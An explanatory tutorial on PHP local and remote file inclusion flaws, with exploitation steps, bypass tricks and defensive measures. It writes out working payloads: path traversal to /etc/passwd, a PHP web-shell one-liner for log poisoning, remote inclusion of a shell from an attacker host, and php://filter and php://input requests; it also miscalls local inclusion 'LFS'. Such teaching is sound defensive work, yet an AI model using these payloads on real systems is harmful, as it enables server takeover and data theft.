Detailed Explanation of File Inclusion Vulnerabilities

Detailed Explanation of File Inclusion Vulnerabilities

1. Vulnerability Description
A File Inclusion Vulnerability is a common web security flaw, often occurring when an application dynamically loads files without strictly filtering user input. The vulnerability is categorized into two types:

  • Local File Inclusion (LFS): Accesses sensitive local files on the server (e.g., /etc/passwd) by constructing specific paths.
  • Remote File Inclusion (RFI): Loads and executes malicious code from a remote URL (e.g., http://attacker-server/shell.txt), enabling arbitrary code execution.
    This type of vulnerability often originates from PHP functions like include() and require(), but similar issues can exist in other languages (e.g., JSP, ASP).

2. Conditions for Vulnerability

  • Dynamic inclusion mechanism: The code uses inclusion functions with controllable parameters (e.g., include($_GET['file']);).
  • Lack of path validation: No filtering or restriction on user-supplied file paths.
  • Additional condition for RFI: PHP configuration requires allow_url_include=On (usually disabled by default).

3. Attack Principles and Exploitation Steps
Local File Inclusion (LFS) Example:
Assume the code: <?php include($_GET['page'] . '.php'); ?>. An attacker can exploit it as follows:

  1. Directory Traversal:

    • Normal request: /index.php?page=about → includes about.php.
    • Attack request: /index.php?page=../../etc/passwd%00 (uses null byte %00 to truncate the .php suffix).
    • Result: The server returns the contents of /etc/passwd.

  2. Exploiting Log Files:

    • Step 1: Inject malicious code into the User-Agent header: <?php system($_GET['cmd']); ?>.
    • Step 2: Use LFS to include a log file (e.g., /var/log/apache2/access.log).
    • Step 3: Pass the parameter ?cmd=id to execute system commands.

Remote File Inclusion (RFI) Example:

  1. The attacker places a malicious file shell.txt on a public server: 
    <?php system($_GET['cmd']); ?>
  2. The target website has an RFI vulnerability: 
    /index.php?page=http://attacker-ip/shell.txt
  3. The server loads the remote file and executes the PHP code within it. The attacker controls the server via ?cmd=command.

4. Advanced Exploitation Techniques

  • Using PHP Wrappers:
    • php://filter: Read file source code (Base64-encoded to avoid parsing): 
      /index.php?page=php://filter/convert.base64-encode/resource=config.php
    • php://input: Directly execute code from POST data (requires allow_url_include=On): 
      POST /index.php?page=php://input  
Body: <?php system('ls'); ?>
  • Bypassing Restrictions:
    • Path traversal: Use ....// or encoding (e.g., %2e%2e/) to bypass simple filters.
    • Suffix truncation: Null byte %00 (PHP <5.3 only) or length-based truncation (e.g., overly long paths).

5. Defense Measures

  • Whitelist Validation: Only allow inclusion of predefined filenames (e.g., about|contact|home).
  • Fixed Directory: Set a base path (e.g., include("./pages/" . $file);).
  • Disable Dangerous Functions: Turn off allow_url_include and allow_url_fopen.
  • Filter Special Characters: Block strings containing ../, http://, php://, etc.
  • File Extension Restrictions: Avoid dynamically appending suffixes, or enforce strict file extension validation.

6. Real-World Cases

  • WordPress Plugin Vulnerabilities: Historical vulnerabilities in multiple plugins due to unfiltered include parameters leading to LFS/RFI.
  • Metasploit Module: Built-in exploit/multi/php/php_include for automated RFI attacks.

In summary, the core of file inclusion vulnerabilities lies in "user-controlled file paths." Defense requires addressing both input validation and server configuration.